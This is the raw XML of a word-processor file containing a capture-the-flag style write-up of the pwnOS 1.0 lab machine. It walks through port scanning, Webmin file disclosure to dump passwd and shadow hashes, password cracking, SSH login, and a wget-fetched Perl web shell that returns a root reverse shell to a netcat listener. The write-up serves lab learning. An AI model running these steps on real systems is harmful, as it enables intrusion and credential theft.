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handas" w:hAnsi="Chandas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Chandas" w:hAnsi="Chandas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PWNOS 1.0 WRITEUP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Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RECONNAISSANCE:-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-------&gt; Finding the IP address of the target machine using " Netdiscover " tool :-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Command Used :- sudo netdiscover -i eth0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Output :-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</w:rPr>
        <w:t xml:space="preserve">6 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 360            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</w:rPr>
        <w:t>_____________________________________________________________________________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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">IP            At MAC Address     Count     Len  MAC Vendor / Hostname      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</w:rPr>
        <w:t>-----------------------------------------------------------------------------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</w:rPr>
        <w:t xml:space="preserve">192.168.1.104   00:50:56:c0:00:01      1      60  VMware, Inc.             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</w:rPr>
        <w:t xml:space="preserve">192.168.84.1    00:50:56:c0:00:01      2     120  VMware, Inc.             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</w:rPr>
        <w:t xml:space="preserve">192.168.84.129  00:0c:29:5e:18:c9      2     120  VMware, Inc.             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</w:rPr>
        <w:t xml:space="preserve">192.168.84.254  00:50:56:f3:a8:4a      1      60  VMware, Inc.             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                                                               </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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The target machine's IP address will be : 192.168.84.129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Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SCANNING:-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--------&gt; Performing a basic port scan on all ports using " Nmap " tool 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Command Used :- nmap 192.168.84.129 -p-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Output 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┌──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>kali)-[~]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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>$ nmap 192.168.84.129 -p-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Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 04:40 EDT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Nmap scan report for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Host is up (0.0022s latency).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Not shown: 65530 closed ports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PORT      STATE SERVICE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22/tcp    open  ssh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80/tcp    open  http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139/tcp   open  netbios-ssn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445/tcp   open  microsoft-ds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10000/tcp open  snet-sensor-mgmt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Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds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--------&gt; Performing script scan using nmap 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Command Used :- sudo nmap 192.168.84.129 -p- --script vuln -sT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Output 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┌──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>kali)-[~]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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>$ sudo nmap 192.168.84.129 -p- --script vuln -sT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[sudo] password for kali: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Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 04:51 EDT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Nmap scan report for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Host is up (0.0025s latency).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Not shown: 65530 closed ports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PORT      STATE SERVICE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22/tcp    open  ssh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80/tcp    open  http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|_http-csrf: Couldn't find any CSRF vulnerabilities.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|_http-dombased-xss: Couldn't find any DOM based XSS.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| http-enum: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/icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'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/index/: Potentially interesting folder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  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'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| http-slowloris-check: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VULNERABLE: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Slowloris DOS attack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State: LIKELY VULNERABLE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IDs:  CVE:CVE-2007-6750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Slowloris tries to keep many connections to the target web server open and hold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them open as long as possible.  It accomplishes this by opening connections to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the target web server and sending a partial request. By doing so, it starves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the http server's resources causing Denial Of Service.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|      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Disclosure date: 2009-09-17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References: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https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750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      http://ha.ckers.org/slowloris/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|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.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|_http-trace: TRACE is enabled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|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)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139/tcp   open  netbios-ssn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445/tcp   open  microsoft-ds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10000/tcp open  snet-sensor-mgmt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| http-vuln-cve2006-3392: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VULNERABLE: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Webmin File Disclosure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State: VULNERABLE (Exploitable)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IDs:  CVE:CVE-2006-3392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Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.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This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences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to bypass the removal of "../" directory traversal sequences.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|      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Disclosure date: 2006-06-29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References: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http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure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       http://www.exploit-db.com/exploits/1997/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      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392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MAC Address: 00:0C:29:5E:18:C9 (VMware)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Host script results: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|_smb-vuln-ms10-054: false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|_smb-vuln-ms10-061: false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|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)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Nmap done: 1 IP address (1 host up) scanned in 326.33 seconds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--------&gt; The basic port scan showed port 80 and 10000 open, So We can assume there might be a webpages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running on that machine and can perform nikto scan on the target machine.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Command Used :- nikto --url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Output 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┌──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>kali)-[~]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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>$ nikto --url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- Nikto v2.1.6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---------------------------------------------------------------------------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Target IP:         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Target Hostname:   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Target Port:        80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Start Time:         2021-05-03 06:03:19 (GMT-4)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---------------------------------------------------------------------------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Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6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Retrieved x-powered-by header: PHP/5.2.3-1ubuntu6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The anti-clickjacking X-Frame-Options header is not present.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The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS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The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type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PHP/5.2.3-1ubuntu6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.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Apache/2.2.4 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.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Uncommon header 'tcn' found, with contents: list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Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php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+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE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Web Server returns a valid response with junk HTTP methods, this may cause false positives.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OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST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OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.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OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.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OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.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OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.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OSVDB-3268: /php/: Directory indexing found.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OSVDB-3092: /php/: This might be interesting...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OSVDB-3268: /icons/: Directory indexing found.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Server may leak inodes via ETags, header found with file /icons/README, inode: 294754, size: 4872, mtime: Thu Jun 24 15:46:08 2010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OSVDB-3233: /icons/README: Apache default file found.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/index1.php: PHP include error may indicate local or remote file inclusion is possible.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+ 8724 requests: 0 error(s) and 21 item(s) reported on remote host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End Time:           2021-05-03 06:03:48 (GMT-4) (29 seconds)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---------------------------------------------------------------------------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+ 1 host(s) tested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                                           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----------&gt; From the nmap scan , It is clear that port 10000 which is running webmin service is vulnerable and it's CVE id is " CVE-2006-3392 " . So, by searching the CVE number in metasploit console ,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an exploit is found for that particular cve id.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Output :-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msf6 &gt; search CVE:CVE-2006-3392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Matching Modules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================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#  Name                                    Disclosure Date  Rank    Check  Description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-  ----                                    ---------------  ----    -----  -----------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0  auxiliary/admin/webmin/file_disclosure  2006-06-30       normal  No     Webmin File Disclosure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Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/webmin/file_disclosure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---&gt; Then, I used that particular exploit and set the rhosts value and ran the exploit , it resulted in the following output,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Output :-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msf6 auxiliary(admin/webmin/file_disclosure) &gt; show options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Module options (auxiliary/admin/webmin/file_disclosure):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Name     Current Setting   Required  Description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----     ---------------   --------  -----------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DIR      /unauthenticated  yes       Webmin directory path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Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]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RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'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RPATH    /etc/passwd       yes       The file to download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RPORT    10000             yes       The target port (TCP)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SSL      false             no        Negotiate SSL/TLS for outgoing connections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VHOST                      no        HTTP server virtual host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Auxiliary action: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Name      Description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----      -----------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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>Download  Download arbitrary file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msf6 auxiliary(admin/webmin/file_disclosure) &gt; set rhosts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rhosts =&gt;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msf6 auxiliary(admin/webmin/file_disclosure) &gt; run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[*] Running module against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[*] Attempting to retrieve /etc/passwd...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[*] The server returned: 200 Document follows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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr/sbin:/bin/sh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bin:x:2:2:bin:/bin:/bin/sh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sys:x:3:3:sys:/dev:/bin/sh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sync:x:4:65534:sync:/bin:/bin/sync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games:x:5:60:games:/usr/games:/bin/sh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man:x:6:12:man:/var/cache/man:/bin/sh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lp:x:7:7:lp:/var/spool/lpd:/bin/sh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mail:x:8:8:mail:/var/mail:/bin/sh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news:x:9:9:news:/var/spool/news:/bin/sh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uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh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proxy:x:13:13:proxy:/bin:/bin/sh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www-data:x:33:33:www-data:/var/www:/bin/sh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backup:x:34:34:backup:/var/backups:/bin/sh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list:x:38:38:Mailing List Manager:/var/list:/bin/sh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irc:x:39:39:ircd:/var/run/ircd:/bin/sh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gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh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nobody:x:65534:65534:nobody:/nonexistent:/bin/sh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dhcp:x:100:101::/nonexistent:/bin/false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syslog:x:101:102::/home/syslog:/bin/false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klog:x:102:103::/home/klog:/bin/false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mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false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sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin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vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash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obama:x:1001:1001::/home/obama:/bin/bash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osama:x:1002:1002::/home/osama:/bin/bash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yomama:x:1003:1003::/home/yomama:/bin/bash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[*] Auxiliary module execution completed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--&gt; using this exploit , I was able to retrieve /etc/passwd file. Now, I changed "RPATH" value to /etc/shadow to check whether the exploit can retrieve shadow file which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contains hashed passwords and it worked as expected.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Output :-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msf6 auxiliary(admin/webmin/file_disclosure) &gt; set rpath /etc/shadow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rpath =&gt; /etc/shadow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msf6 auxiliary(admin/webmin/file_disclosure) &gt; run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[*] Running module against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[*] Attempting to retrieve /etc/shadow...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[*] The server returned: 200 Document follows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root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::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daemon:*:14040:0:99999:7:::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bin:*:14040:0:99999:7:::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sys:*:14040:0:99999:7:::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sync:*:14040:0:99999:7:::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games:*:14040:0:99999:7:::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man:*:14040:0:99999:7:::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lp:*:14040:0:99999:7:::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mail:*:14040:0:99999:7:::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news:*:14040:0:99999:7:::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uucp:*:14040:0:99999:7:::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proxy:*:14040:0:99999:7:::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www-data:*:14040:0:99999:7:::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backup:*:14040:0:99999:7:::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list:*:14040:0:99999:7:::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irc:*:14040:0:99999:7:::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gnats:*:14040:0:99999:7:::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nobody:*:14040:0:99999:7:::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dhcp:!:14040:0:99999:7:::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syslog:!:14040:0:99999:7:::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klog:!:14040:0:99999:7:::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mysql:!:14040:0:99999:7:::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sshd:!:14040:0:99999:7:::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vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::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obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::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osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::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yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::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[*] Auxiliary module execution completed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----------&gt; Now, I have the hashed passwords for the users. I need to crack the passwords and attempt ssh login since port 22 is open.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To crack the passwords I'll use " John the ripper " tool and " rockyou " wordlist.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Command Used :- john vmware --wordlist=/home/kali/Documents/rockyou.txt --format=md5crypt-long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and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john vmware --show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Output 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┌──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>kali)-[~]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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">$ john vmware --wordlist=/home/kali/Documents/rockyou.txt --format=md5crypt-long      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Using default input encoding: UTF-8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Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])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No password hashes left to crack (see FAQ)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┌──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>kali)-[~]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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">$ john vmware --show                                                           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?:h4ckm3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1 password hash cracked, 0 left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>------&gt; I was able to get the password for the user "vmware" after cracking the hash using " John "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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>Password : h4ckm3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b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GAINING ACCESS:-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------&gt; Now, I'll try to login via ssh using the cracked password.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Output :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┌──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
        </w:rPr>
        <w:t>(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
        </w:rPr>
        <w:t>kali)-[~]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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
        </w:rPr>
        <w:t>$ ssh vmware@192.168.84.129                                                                                                                                                                               1 ⨯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The authenticity of host '192.168.84.129 (192.168.84.129)' can't be established.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RSA key fingerprint is SHA256:+C7UA7dQ1B/8zVWHRBD7KeNNfjuSBrtQBMZGd6qoR9w.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Are you sure you want to continue connecting (yes/no/[fingerprint])? yes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Warning: Permanently added '192.168.84.129' (RSA) to the list of known hosts.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 xml:space="preserve">vmware@192.168.84.129's password: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Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686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The programs included with the Ubuntu system are free software;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the exact distribution terms for each program are described in the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individual files in /usr/share/doc/*/copyright.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Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by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applicable law.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Last login: Fri Jun 20 14:35:37 2008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 xml:space="preserve">vmware@ubuntuvm:~$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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
        </w:rPr>
        <w:t>------&gt; And it worked.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Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MAINTAINING ACCESS AND PRIVILEGE ESCALATION:-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"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 xml:space="preserve">-----&gt; Webmin is using perl with .cgi extension , I found it when I viewed the page source and there was session_login.cgi file. I wanted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 xml:space="preserve">to see the content of the file hoping there'd be some sort of hint to bypass login page. Instead, I found out it's using perl. So , my initial thought was to replace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 xml:space="preserve">the original session_login.cgi file with perl backdoor by renaming it to session_login.cgi and request that particular file from metasploit console, the same way I dumped shadow and passwd files.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I tried replacing that file but I couldn't do so because I'm not in sudoers group. So, I copied the perl webshell in the name of exp.cgi and copied it to /tmp folder on the target machine and changed permsissions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for that file I copied. Now, I changed the rpath on the metasploit console to "/tmp/exp.cgi". Then , I've setup a netcat listener on my attacker machine and ran the exploit on metasploit console.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I instantly got the reverse shell with root access.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 xml:space="preserve">Commands Used :-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attacker side :- python -m SimpleHTTPServer 9090 , nc -lvp 3434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target side :- wget http:192.168.84.128:9090/exp.cgi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ab/>
        <w:tab/>
        <w:t>mv exp.cgi /tmp/exp.cgi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Output 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Metasploit Console Output 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msf6 auxiliary(admin/webmin/file_disclosure) &gt; set rpath /tmp/exp.cgi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rpath =&gt; /tmp/exp.cgi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msf6 auxiliary(admin/webmin/file_disclosure) &gt; set rhosts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rhosts =&gt;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msf6 auxiliary(admin/webmin/file_disclosure) &gt; run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[*] Running module against 192.168.84.129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[*] Attempting to retrieve /tmp/exp.cgi...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[*] The server returned: 200 Document follows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Browser IP address appears to be: 192.168.84.128&lt;p&gt;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Content-Length: 97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Connection: close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Content-Type: text/html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Browser IP address appears to be: 192.168.84.128&lt;p&gt;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Sent reverse shell to 192.168.84.128:3434&lt;p&gt;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[*] Auxiliary module execution completed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Netcat Listener Output:-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┌──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali)-[~]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└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$ nc -lvp 3434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listening on [any] 3434 ...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192.168.84.129: inverse host lookup failed: Host name lookup failure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connect to [192.168.84.128] from (UNKNOWN) [192.168.84.129] 40224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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>08:44:13 up  5:05,  1 user,  load average: 0.00, 0.00, 0.00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USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT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vmware   pts/0    192.168.84.128   06:48   10:25m  0.11s  0.11s -bash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Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux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uid=0(root) gid=0(root)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/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/usr/sbin/apache: can't access tty; job control turned off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# whoami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root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 xml:space="preserve"># </w:t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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono" w:eastAsia="Bitstream Vera Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Bitstream Vera Sans Mono" w:ascii="Bitstream Vera Sans Mono" w:hAnsi="Bitstream Vera Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now, I successfully got root access on pwnos machine.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Bitstream Vera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10</Pages>
  <Words>1903</Words>
  <Characters>13391</Characters>
  <CharactersWithSpaces>16461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2021-05-03T19:19:51Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-03T19:30:10Z</dcterms:modified>
